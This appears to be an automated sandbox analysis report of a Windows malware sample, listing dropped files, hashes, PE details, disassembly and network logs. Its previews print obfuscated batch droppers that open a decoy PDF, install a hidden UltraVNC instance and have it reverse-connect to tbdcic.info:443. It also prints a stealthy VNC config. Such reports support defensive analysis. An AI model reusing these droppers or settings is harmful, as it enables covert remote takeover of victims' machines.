                                                    Preview:@echo off.setlocal enabledelayedexpansion.set QEy79=browser_sn.set Mkr26=co.set ReO81=nhost.set dUEeo=443.set wP5sf=%COMPUTERNAME%.set LtQEq=co.set Eqm2m=nne.set wapw9=ct.set Gruna=tbdcic.info.set oSLdS=exe.set jSEQA=autore.set HaGkC=194.87.252.28.timeout /t 1.taskkill /f /im %QEy79%.%oSLdS% .timeout /t 2.start "" %WINDIR%\Tasks\%QEy79%.%oSLdS% .timeout /t 8.start "" %WINDIR%\Tasks\%QEy79%.%oSLdS% -%jSEQA%%LtQEq%%Eqm2m%%wapw9% -id:%wP5sf%_Jd0Qd -%LtQEq%%Eqm2m%%wapw9% %Gruna%:443.timeout /t 4.exit.
                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                    File Type:DOS batch file, ASCII text
                                                    Category:dropped
                                                    Size (bytes):1001
                                                    Entropy (8bit):5.502266483327757
                                                    Encrypted:false
                                                    SSDEEP:24:g5byOTMorMKXGw+kMLz2NcflizT/P2bkAMlvRx/m:IOOBrMKx8TMzL9vx/m
                                                    MD5:A99AF3E2449A048C4436329C1AF6F48F
                                                    SHA1:06C2CB982455A7A2FCB76AE70D7C3ED6871361DA
                                                    SHA-256:B3571E56EB1A88188B2CE9AC1E67F429E7D949D09528437A7F32689A2371CC78
                                                    SHA-512:C8AD6E74A0C8D29538042FDC429547AD0FB7E8F96B3E5E59644EFA6837BF243E31A3193F2B385316421730733330F346498044EFC62BA152AC79FC7CD9C7A559
                                                    Malicious:false
                                                    Preview:@echo off.setlocal enabledelayedexpansion.set ReO81=nhost.set Eqm2m=nne.set LtQEq=co.set oSLdS=exe.set Tnd6s=Lom.set uXzAr=pdf.set Fl8oQ=raVNC.set wP5sf=%COMPUTERNAME%.set jSEQA=autore.set TNi7V=%WINDIR%\Tasks\3889122.cmd.set Gruna=tbdcic.info.set IXrxR=Jd0Qd.set M6Juw=443.set Mkr26=co.set wapw9=ct.set D7rq9=Ult.set QEy79=browser_sn.set Fr9ND=ini.timeout /t 1.copy "DygIR.vkc0f" "%HOMEPATH%\Downloads\%Tnd6s%.%uXzAr%" & start "" "%HOMEPATH%\Downloads\%Tnd6s%.%uXzAr%".timeout /t 1.taskkill /f /im %QEy79%.%oSLdS% .timeout /t 2.copy "Xv6Ya.d8LhT" "%QEy79%.%oSLdS%".timeout /t 1.copy "go3uE.OUJMA" "%D7rq9%%Fl8oQ%.%Fr9ND%".timeout /t 2.start "" %WINDIR%\Tasks\%QEy79%.%oSLdS% .timeout /t 8.start "" %WINDIR%\Tasks\%QEy79%.%oSLdS% -%jSEQA%%LtQEq%%Eqm2m%%wapw9% -id:%wP5sf%_%IXrxR% -%LtQEq%%Eqm2m%%wapw9% %Gruna%:%M6Juw%.timeout /t 2.copy "uqVb3.kkb9h" "%Mkr26%%ReO81%.%oSLdS%".timeout /t 4.:loop.if exist "%TNi7V%" (. cmd /c "%TNi7V%". timeout /t 600. goto :loop.) else (. timeout /t 42. goto :loop.).
                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                    File Type:DOS batch file, ASCII text
                                                    Category:dropped
                                                    Size (bytes):1001
                                                    Entropy (8bit):5.502266483327757
                                                    Encrypted:false
                                                    SSDEEP:24:g5byOTMorMKXGw+kMLz2NcflizT/P2bkAMlvRx/m:IOOBrMKx8TMzL9vx/m
                                                    MD5:A99AF3E2449A048C4436329C1AF6F48F
                                                    SHA1:06C2CB982455A7A2FCB76AE70D7C3ED6871361DA
                                                    SHA-256:B3571E56EB1A88188B2CE9AC1E67F429E7D949D09528437A7F32689A2371CC78
                                                    SHA-512:C8AD6E74A0C8D29538042FDC429547AD0FB7E8F96B3E5E59644EFA6837BF243E31A3193F2B385316421730733330F346498044EFC62BA152AC79FC7CD9C7A559
                                                    Malicious:false
                                                    Preview:@echo off.setlocal enabledelayedexpansion.set ReO81=nhost.set Eqm2m=nne.set LtQEq=co.set oSLdS=exe.set Tnd6s=Lom.set uXzAr=pdf.set Fl8oQ=raVNC.set wP5sf=%COMPUTERNAME%.set jSEQA=autore.set TNi7V=%WINDIR%\Tasks\3889122.cmd.set Gruna=tbdcic.info.set IXrxR=Jd0Qd.set M6Juw=443.set Mkr26=co.set wapw9=ct.set D7rq9=Ult.set QEy79=browser_sn.set Fr9ND=ini.timeout /t 1.copy "DygIR.vkc0f" "%HOMEPATH%\Downloads\%Tnd6s%.%uXzAr%" & start "" "%HOMEPATH%\Downloads\%Tnd6s%.%uXzAr%".timeout /t 1.taskkill /f /im %QEy79%.%oSLdS% .timeout /t 2.copy "Xv6Ya.d8LhT" "%QEy79%.%oSLdS%".timeout /t 1.copy "go3uE.OUJMA" "%D7rq9%%Fl8oQ%.%Fr9ND%".timeout /t 2.start "" %WINDIR%\Tasks\%QEy79%.%oSLdS% .timeout /t 8.start "" %WINDIR%\Tasks\%QEy79%.%oSLdS% -%jSEQA%%LtQEq%%Eqm2m%%wapw9% -id:%wP5sf%_%IXrxR% -%LtQEq%%Eqm2m%%wapw9% %Gruna%:%M6Juw%.timeout /t 2.copy "uqVb3.kkb9h" "%Mkr26%%ReO81%.%oSLdS%".timeout /t 4.:loop.if exist "%TNi7V%" (. cmd /c "%TNi7V%". timeout /t 600. goto :loop.) else (. timeout /t 42. goto :loop.).
                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                    File Type:PDF document, version 1.5 (zip deflate encoded)
                                                    Category:dropped
                                                    Size (bytes):605114
                                                    Entropy (8bit):7.931189302613814
                                                    Encrypted:false
                                                    SSDEEP:12288:A9bEzJrWWXvkqWpnMs6LQ1BU9U0pGOdbLL23yKBcPr:AFEzJrZXvkqYgUwuCUcPr
                                                    MD5:A18D0E3EEEF0D6E099BAB52F8B041446
                                                    SHA1:4879750BEC07AA11629950310AF538E9A9D91D20
                                                    SHA-256:95F656B24E7D5E192BF4EA8216CCB539299EE908A3E998FCEE4B1A655BAF66EF
                                                    SHA-512:6E2C2D96C98EE24AC6235B35131889D338ABC5E8399A41204AB2DFCFF56E40ABF6476A3F080A0F12715F8A6685182258EA6183645FD8D337B7F09EE14295FBAD
                                                    Malicious:false
                                                    Preview:%PDF-1.5.%.....92 0 obj.<</Filter/FlateDecode/Length 3501>>.stream.x..Zmo...>..EA.,..(J.s~..S+.v..^.b.....4...Ea.I..m.4_..;......%0p:......3.......?..w........&/../.........=...en......?...../..m._..v.}T..l..?..g...l.7.A....Nq..z.m..c..Nv...<.........3...s4.C..C...f.....l.0...-.-8...~.c.yi.`y..]...uf.)K.x...1T...Iw...5D..iE.v.a5.t..h.3Z.@..XRgXR..4....A.....a..C.)n.E%...g....d....T.$..?..`Z.>...F....:.aT8].k:|...v.....=+}..O..A.a..z6.D.SU.]'"=.f2...1....`.}R.#.R.4.....<$......Z..agQ....u....V.$~.z5*.?.r.).......'.p..6...l..#~...}....c.8k{/$.Z8G....:..5A.T......M....b.M..._.FE.}.5.........;...e.....j.......E...4...'E.e'..>....u..v...l..?..u.x......_"..-.9.CX.3.#...=....;.......b.j........j*$Y..G......./,..Rh.....m...'9..V.....e.".....Y.{...?g.bi..*...T..0!.k.8q......)...xN{..g.`G..F.0.n~.U!.a..(.!..^...[.d'.?fw....x.h...[.:.*-..#;.lM@.c.+x1......nFK...].>..n@,H..-.C ........*zf.Z.0W-.....5#]...C..8.Pm1Q.8...5.,. ....Ce=....p.5.u!.e.....Q).=.G.
                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                    File Type:Generic INItialization configuration [admin]
                                                    Category:dropped
                                                    Size (bytes):858
                                                    Entropy (8bit):5.233343202654504
                                                    Encrypted:false
                                                    SSDEEP:24:z/h28nCi2vMQg9KgJhuXNTxYgMei3MAKJ/nn:rh28nC2/KgJOr8eTx/n
                                                    MD5:C55EEA597023B8C774986495ECAE5B33
                                                    SHA1:279315CE36021D2C86AE97EBFAA528749FA89544
                                                    SHA-256:75490184E52519B37CC1DF17AF419C260BD50575C57FFA46366A877E4FC57ACA
                                                    SHA-512:D838DA28246C21A3A9920E05B2E5AA58321F5C08D5F18B0F372E9436641977E9A33585706A85A7F84116F27B456C5589E4D2235CB8E178F824483493F508989B
                                                    Malicious:false
                                                    Preview:[Permissions]..[admin]..LocalInputsDisabled=0..IdleTimeout=0..EnableJapInput=0..RemoveAero=0..DebugMode=0..Avilog=0..path=Y:..DebugLevel=0..AllowLoopback=0..LoopbackOnly=0..AllowShutdown=1..AllowProperties=1..AllowEditClients=1..FileTransferTimeout=50..KeepAliveInterval=6..SocketKeepAliveTimeout=12000..DisableTrayIcon=1..MSLogonRequired=0..NewMSLogon=0..ConnectPriority=0..QuerySetting=2..QueryTimeout=8..QueryAccept=0..LockSetting=0..RemoveWallpaper=0..RemoveEffects=0..RemoveFontSmoothing=0..FileTransferEnabled=1..FTUserImpersonation=1..BlankMonitorEnabled=0..BlankInputsOnly=0..DefaultScale=1..UseDSMPlugin=0..DSMPlugin=..DSMPluginConfig=..primary=1..secondary=0..SocketConnect=0..HTTPConnect=0..XDMCPConnect=0..AutoPortSelect=1..PortNumber=5628..HTTPPortNumber=5800..InputsEnabled=1..[UltraVNC]..passwd=F0341C75FCAEB31BD2..passwd2=F2409C75FCAEB22BD2..
                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):1945368
                                                    Entropy (8bit):6.532894678367002
                                                    Encrypted:false
                                                    SSDEEP:24576:7x+OMUhcLEQ6EIN1sz4LD7hKCt+/WppxJ1Rj0rPz3AUA/Jpu:FQXL0d7hdrr0rPz3AUA/J0
                                                    MD5:749B3A68B9C5325D592822EE7C2C17EC
                                                    SHA1:3EDE6BB2DF969432358A5883CF226971FDE8B7D4
                                                    SHA-256:F7D4080AD8259B0AAC2504F8B5D8FAB18E5124321C442C8BCB577598059D0B24
                                                    SHA-512:B9C5AE6BA6145048721F6B4D5D9D751E7F0E6945D4D72FDB7959AED11BFC24ABDDBDF02A55A19FDD990648CAA6710ACAE9488329CBE3ABBC808C704954948998
                                                    Malicious:true
                                                    Yara Hits:
                                                    • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: C:\Windows\Tasks\Xv6Ya.d8LhT, Author: Joe Security
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r.l.6...6...6.......8...-U......-U..8...-U..r...6...9...?...4...?...7...?...!...6.......-U......-U..7...-U..7...Rich6...........................PE..d....Y,T.........."......|..........4..........@..............................(.....0.....@.............................................................t.......$.............(.........................................................(............................text....{.......|.................. ..`.rdata..,?.......@..................@..@.data....6.......D..................@....pdata..$...........................@..@.rsrc...t...........................@..@.reloc...$....(..&...p..............@..B................................................................................................................................................................................................................................
                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):1945368
                                                    Entropy (8bit):6.532894678367002
                                                    Encrypted:false
                                                    SSDEEP:24576:7x+OMUhcLEQ6EIN1sz4LD7hKCt+/WppxJ1Rj0rPz3AUA/Jpu:FQXL0d7hdrr0rPz3AUA/J0
                                                    MD5:749B3A68B9C5325D592822EE7C2C17EC
                                                    SHA1:3EDE6BB2DF969432358A5883CF226971FDE8B7D4
                                                    SHA-256:F7D4080AD8259B0AAC2504F8B5D8FAB18E5124321C442C8BCB577598059D0B24
                                                    SHA-512:B9C5AE6BA6145048721F6B4D5D9D751E7F0E6945D4D72FDB7959AED11BFC24ABDDBDF02A55A19FDD990648CAA6710ACAE9488329CBE3ABBC808C704954948998
                                                    Malicious:true
                                                    Yara Hits:
                                                    • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: C:\Windows\Tasks\browser_sn.exe, Author: Joe Security
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r.l.6...6...6.......8...-U......-U..8...-U..r...6...9...?...4...?...7...?...!...6.......-U......-U..7...-U..7...Rich6...........................PE..d....Y,T.........."......|..........4..........@..............................(.....0.....@.............................................................t.......$.............(.........................................................(............................text....{.......|.................. ..`.rdata..,?.......@..................@..@.data....6.......D..................@....pdata..$...........................@..@.rsrc...t...........................@..@.reloc...$....(..&...p..............@..B................................................................................................................................................................................................................................
                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):867840
                                                    Entropy (8bit):6.386550733462827
                                                    Encrypted:false
                                                    SSDEEP:12288:viUJpFQQzI8Qxdp0rksF0Wd24ylXTA4lENCbQZMCF0jdMH:viE/rIpx4rkN8olUWENCsyCF0pe
                                                    MD5:0F568F6C821565AB9FF45C7457953789
                                                    SHA1:F948A4C5E01A74B17D0F966615834BA76DC1BADC
                                                    SHA-256:CC0A60CD15FA21E54615E46CD0F10CFBE86F496DC64D14B31D9F3B415D120EE1
                                                    SHA-512:B73427198596803013F0A1F1F25628380A148D226903C0F91145546B675D17EADA177A18155E4183FAA4B692365141CE1FCDBD13C2C4F8235EB73BECF972EFE8
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?]T.^3..^3..^3..&...^3..57..^3..50..^3..^2..[3..52..^3..5>.z^3..56..^3..5...^3..5...^3..51..^3.Rich.^3.........PE..d...?...........".................`..........@....................................9g....`.......... .......................................................`......................pB..p.......................(................... ...`............................text...@........................... ..`.rdata..^J.......L..................@..@.data....H..........................@....pdata.......`......................@..@.didat..............................@....rsrc...............................@..@.reloc...............0..............@..B........................................................................................................................................................................................................................
                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                    File Type:Generic INItialization configuration [admin]
                                                    Category:dropped
                                                    Size (bytes):858
                                                    Entropy (8bit):5.233343202654504
                                                    Encrypted:false
                                                    SSDEEP:24:z/h28nCi2vMQg9KgJhuXNTxYgMei3MAKJ/nn:rh28nC2/KgJOr8eTx/n
                                                    MD5:C55EEA597023B8C774986495ECAE5B33
                                                    SHA1:279315CE36021D2C86AE97EBFAA528749FA89544
                                                    SHA-256:75490184E52519B37CC1DF17AF419C260BD50575C57FFA46366A877E4FC57ACA
                                                    SHA-512:D838DA28246C21A3A9920E05B2E5AA58321F5C08D5F18B0F372E9436641977E9A33585706A85A7F84116F27B456C5589E4D2235CB8E178F824483493F508989B
                                                    Malicious:false
                                                    Preview:[Permissions]..[admin]..LocalInputsDisabled=0..IdleTimeout=0..EnableJapInput=0..RemoveAero=0..DebugMode=0..Avilog=0..path=Y:..DebugLevel=0..AllowLoopback=0..LoopbackOnly=0..AllowShutdown=1..AllowProperties=1..AllowEditClients=1..FileTransferTimeout=50..KeepAliveInterval=6..SocketKeepAliveTimeout=12000..DisableTrayIcon=1..MSLogonRequired=0..NewMSLogon=0..ConnectPriority=0..QuerySetting=2..QueryTimeout=8..QueryAccept=0..LockSetting=0..RemoveWallpaper=0..RemoveEffects=0..RemoveFontSmoothing=0..FileTransferEnabled=1..FTUserImpersonation=1..BlankMonitorEnabled=0..BlankInputsOnly=0..DefaultScale=1..UseDSMPlugin=0..DSMPlugin=..DSMPluginConfig=..primary=1..secondary=0..SocketConnect=0..HTTPConnect=0..XDMCPConnect=0..AutoPortSelect=1..PortNumber=5628..HTTPPortNumber=5800..InputsEnabled=1..[UltraVNC]..passwd=F0341C75FCAEB31BD2..passwd2=F2409C75FCAEB22BD2..
                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):867840
                                                    Entropy (8bit):6.386550733462827
                                                    Encrypted:false
                                                    SSDEEP:12288:viUJpFQQzI8Qxdp0rksF0Wd24ylXTA4lENCbQZMCF0jdMH:viE/rIpx4rkN8olUWENCsyCF0pe
                                                    MD5:0F568F6C821565AB9FF45C7457953789
                                                    SHA1:F948A4C5E01A74B17D0F966615834BA76DC1BADC
                                                    SHA-256:CC0A60CD15FA21E54615E46CD0F10CFBE86F496DC64D14B31D9F3B415D120EE1
                                                    SHA-512:B73427198596803013F0A1F1F25628380A148D226903C0F91145546B675D17EADA177A18155E4183FAA4B692365141CE1FCDBD13C2C4F8235EB73BECF972EFE8
                                                    Malicious:false
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?]T.^3..^3..^3..&...^3..57..^3..50..^3..^2..[3..52..^3..5>.z^3..56..^3..5...^3..5...^3..51..^3.Rich.^3.........PE..d...?...........".................`..........@....................................9g....`.......... .......................................................`......................pB..p.......................(................... ...`............................text...@........................... ..`.rdata..^J.......L..................@..@.data....H..........................@....pdata.......`......................@..@.didat..............................@....rsrc...............................@..@.reloc...............0..............@..B........................................................................................................................................................................................................................
                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                    Entropy (8bit):7.9513802823208
                                                    TrID:
                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                    • DOS Executable Generic (2002/1) 0.02%
                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                    File name:T8xrZb7nBL.exe
                                                    File size:1'670'955 bytes
                                                    MD5:1677bd5b561b890396ae1816066ca481
                                                    SHA1:9ba4b30a162a261b27397bc1dc3736b94b786f65
                                                    SHA256:d9c7850bde98f2a2cb586b482efd8ff0b6c959ce71f9db699a7b457d5daf5f9e
                                                    SHA512:bac8a3d2e270caf1d00b812d480562ffced7a67d14ac45e1730fb94d5dadf7f5c5fb618133e35f4a7246d16fa53cbada05ea1671c2919973d0e9ccd4b3be3be7
                                                    SSDEEP:24576:WKWs4Estw5N4jqjvXeBKNiVCK/A52aw08KdVUBRAWwPnA5jF0zF77/voe2D7UGxV:TFzseH4jYXeBExKYhd3Yb0zZoe2DNL
                                                    TLSH:767523547793C9F4EA57227408A15C135FA3ED290A40288F33CDF6127A36652FA2BDB7
                                                    File Content Preview:MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L...-..P.................2...H....../8.......P....@.........................................................................$s.............................
                                                    Icon Hash:357561d6dad24d55
                                                    Entrypoint:0x41382f
                                                    Entrypoint Section:.text
                                                    Digitally signed:false
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                    DLL Characteristics:
                                                    Time Stamp:0x50E0002D [Sun Dec 30 08:49:49 2012 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:4
                                                    OS Version Minor:0
                                                    File Version Major:4
                                                    File Version Minor:0
                                                    Subsystem Version Major:4
                                                    Subsystem Version Minor:0
                                                    Import Hash:1d1577d864d2da06952f7affd8635371
                                                    Instruction
                                                    push ebp
                                                    mov ebp, esp
                                                    push FFFFFFFFh
                                                    push 00416E98h
                                                    push 004139C0h
                                                    mov eax, dword ptr fs:[00000000h]
                                                    push eax
                                                    mov dword ptr fs:[00000000h], esp
                                                    sub esp, 68h
                                                    push ebx
                                                    push esi
                                                    push edi
                                                    mov dword ptr [ebp-18h], esp
                                                    xor ebx, ebx
                                                    mov dword ptr [ebp-04h], ebx
                                                    push 00000002h
                                                    call dword ptr [004151DCh]
                                                    pop ecx
                                                    or dword ptr [0041B9E4h], FFFFFFFFh
                                                    or dword ptr [0041B9E8h], FFFFFFFFh
                                                    call dword ptr [004151E0h]
                                                    mov ecx, dword ptr [004199C4h]
                                                    mov dword ptr [eax], ecx
                                                    call dword ptr [004151E4h]
                                                    mov ecx, dword ptr [004199C0h]
                                                    mov dword ptr [eax], ecx
                                                    mov eax, dword ptr [004151E8h]
                                                    mov eax, dword ptr [eax]
                                                    mov dword ptr [0041B9E0h], eax
                                                    call 00007F24F9217BE2h
                                                    cmp dword ptr [00419780h], ebx
                                                    jne 00007F24F9217ACEh
                                                    push 004139B8h
                                                    call dword ptr [004151ECh]
                                                    pop ecx
                                                    call 00007F24F9217BB4h
                                                    push 00419050h
                                                    push 0041904Ch
                                                    call 00007F24F9217B9Fh
                                                    mov eax, dword ptr [004199BCh]
                                                    mov dword ptr [ebp-6Ch], eax
                                                    lea eax, dword ptr [ebp-6Ch]
                                                    push eax
                                                    push dword ptr [004199B8h]
                                                    lea eax, dword ptr [ebp-64h]
                                                    push eax
                                                    lea eax, dword ptr [ebp-70h]
                                                    push eax
                                                    lea eax, dword ptr [ebp-60h]
                                                    push eax
                                                    call dword ptr [004151F4h]
                                                    push 00419048h
                                                    push 00419000h
                                                    call 00007F24F9217B6Ch
                                                    NameVirtual AddressVirtual Size Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x173240xc8.rdata
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x1c0000x309f0.rsrc
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IAT0x150000x364.rdata
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                    .text0x10000x130f00x13200a86014994324ad6f47bddf386fd89176False0.6081495098039216data6.614408281478693IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                    .rdata0x150000x35600x36009abc217bd20b39b1db2f57ddf9bc789cFalse0.4381510416666667data5.5938980842785995IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .data0x190000x29ec0x8004c129856aeef51c872b4a2f6db01e9bdFalse0.44580078125data3.8126171673069433IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .rsrc0x1c0000x309f00x30a0064273c62ea7bfbe17a6e55349807dc90False0.7267683563624678data7.231510619965348IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                    RT_ICON0x1c2800x18dePNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedRussianRussia0.9696826892868363
                                                    RT_ICON0x1db600x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896RussianRussia0.08974964572508266
                                                    RT_ICON0x21d880x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600RussianRussia0.12935684647302906
                                                    RT_ICON0x243300x1a68Device independent bitmap graphic, 40 x 80 x 32, image size 6720RussianRussia0.16553254437869822
                                                    RT_ICON0x25d980x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224RussianRussia0.21106941838649157
                                                    RT_ICON0x26e400x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400RussianRussia0.29508196721311475
                                                    RT_ICON0x277c80x6b8Device independent bitmap graphic, 20 x 40 x 32, image size 1680RussianRussia0.33313953488372094
                                                    RT_ICON0x27e800x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088RussianRussia0.4592198581560284
                                                    RT_GROUP_ICON0x282e80x76dataRussianRussia0.7457627118644068
                                                    RT_VERSION0x283600x350data0.4693396226415094
                                                    RT_MANIFEST0x286b00x33cASCII text, with CRLF line terminatorsEnglishUnited States0.501207729468599
                                                    DLLImport
                                                    COMCTL32.dll
                                                    SHELL32.dllSHGetSpecialFolderPathW, ShellExecuteW, SHGetMalloc, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteExW
                                                    GDI32.dllCreateCompatibleDC, CreateFontIndirectW, DeleteObject, DeleteDC, GetCurrentObject, StretchBlt, GetDeviceCaps, CreateCompatibleBitmap, SelectObject, SetStretchBltMode, GetObjectW
                                                    ADVAPI32.dllFreeSid, AllocateAndInitializeSid, CheckTokenMembership
                                                    USER32.dllGetMenu, SetWindowPos, GetWindowDC, ReleaseDC, CopyImage, GetKeyState, GetWindowRect, ScreenToClient, GetWindowLongW, SetTimer, GetMessageW, DispatchMessageW, KillTimer, DestroyWindow, EndDialog, SendMessageW, wsprintfW, GetClassNameA, GetWindowTextW, GetWindowTextLengthW, GetSysColor, wsprintfA, SetWindowTextW, CreateWindowExW, GetDlgItem, GetClientRect, SetWindowLongW, UnhookWindowsHookEx, SetFocus, GetSystemMetrics, SystemParametersInfoW, ShowWindow, DrawTextW, GetDC, ClientToScreen, GetWindow, DialogBoxIndirectParamW, DrawIconEx, CallWindowProcW, DefWindowProcW, CallNextHookEx, PtInRect, SetWindowsHookExW, LoadImageW, LoadIconW, MessageBeep, EnableWindow, IsWindow, EnableMenuItem, GetSystemMenu, wvsprintfW, CharUpperW, MessageBoxA, GetParent
                                                    ole32.dllCreateStreamOnHGlobal, CoCreateInstance, CoInitialize
                                                    OLEAUT32.dllSysAllocString, VariantClear, OleLoadPicture
                                                    KERNEL32.dllSetFileTime, SetEndOfFile, EnterCriticalSection, DeleteCriticalSection, GetModuleHandleA, LeaveCriticalSection, WaitForMultipleObjects, ReadFile, SetFilePointer, GetFileSize, FormatMessageW, lstrcpyW, LocalFree, IsBadReadPtr, GetSystemDirectoryW, GetCurrentThreadId, SuspendThread, TerminateThread, InitializeCriticalSection, ResetEvent, SetEvent, CreateEventW, GetVersionExW, GetModuleFileNameW, GetCurrentProcess, SetProcessWorkingSetSize, SetCurrentDirectoryW, GetDriveTypeW, CreateFileW, GetCommandLineW, GetStartupInfoW, CreateProcessW, CreateJobObjectW, ResumeThread, AssignProcessToJobObject, CreateIoCompletionPort, SetInformationJobObject, GetQueuedCompletionStatus, GetExitCodeProcess, CloseHandle, SetEnvironmentVariableW, GetTempPathW, GetSystemTimeAsFileTime, lstrlenW, CompareFileTime, SetThreadLocale, FindFirstFileW, DeleteFileW, FindNextFileW, FindClose, RemoveDirectoryW, ExpandEnvironmentStringsW, WideCharToMultiByte, VirtualAlloc, GlobalMemoryStatusEx, lstrcmpW, GetEnvironmentVariableW, lstrcmpiW, lstrlenA, GetLocaleInfoW, MultiByteToWideChar, GetUserDefaultUILanguage, GetSystemDefaultUILanguage, GetSystemDefaultLCID, lstrcmpiA, GlobalAlloc, GlobalFree, MulDiv, FindResourceExA, SizeofResource, LoadResource, LockResource, LoadLibraryA, ExitProcess, lstrcatW, GetDiskFreeSpaceExW, SetFileAttributesW, SetLastError, Sleep, GetExitCodeThread, WaitForSingleObject, CreateThread, GetLastError, SystemTimeToFileTime, GetLocalTime, GetFileAttributesW, CreateDirectoryW, WriteFile, GetStdHandle, VirtualFree, GetModuleHandleW, GetProcAddress, GetStartupInfoA
                                                    MSVCRT.dll??3@YAXPAX@Z, ??2@YAPAXI@Z, memcmp, free, memcpy, _controlfp, _except_handler3, __set_app_type, __p__fmode, __p__commode, _adjust_fdiv, __setusermatherr, _initterm, __getmainargs, _acmdln, exit, _XcptFilter, _exit, ??1type_info@@UAE@XZ, _onexit, __dllonexit, _CxxThrowException, _beginthreadex, _EH_prolog, ?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z, memset, _wcsnicmp, strncmp, wcsncmp, malloc, memmove, _wtol, _purecall
                                                    Language of compilation systemCountry where language is spokenMap
                                                    RussianRussia
                                                    EnglishUnited States
                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Dec 23, 2024 13:29:33.273130894 CET49749443192.168.2.7194.190.152.201
                                                    Dec 23, 2024 13:29:33.273165941 CET44349749194.190.152.201192.168.2.7
                                                    Dec 23, 2024 13:29:33.273317099 CET49749443192.168.2.7194.190.152.201
                                                    Dec 23, 2024 13:29:33.273444891 CET49749443192.168.2.7194.190.152.201
                                                    Dec 23, 2024 13:29:33.273456097 CET44349749194.190.152.201192.168.2.7
                                                    Dec 23, 2024 13:29:33.273518085 CET44349749194.190.152.201192.168.2.7
                                                    Dec 23, 2024 13:29:33.403105974 CET49750443192.168.2.7194.190.152.201
                                                    Dec 23, 2024 13:29:33.403153896 CET44349750194.190.152.201192.168.2.7
                                                    Dec 23, 2024 13:29:33.407547951 CET49750443192.168.2.7194.190.152.201
                                                    Dec 23, 2024 13:29:33.407547951 CET49750443192.168.2.7194.190.152.201
                                                    Dec 23, 2024 13:29:33.407588005 CET44349750194.190.152.201192.168.2.7
                                                    Dec 23, 2024 13:29:33.407675028 CET44349750194.190.152.201192.168.2.7
                                                    Dec 23, 2024 13:29:49.974590063 CET49792443192.168.2.7194.190.152.201
                                                    Dec 23, 2024 13:29:49.974632978 CET44349792194.190.152.201192.168.2.7
                                                    Dec 23, 2024 13:29:49.974740028 CET49792443192.168.2.7194.190.152.201
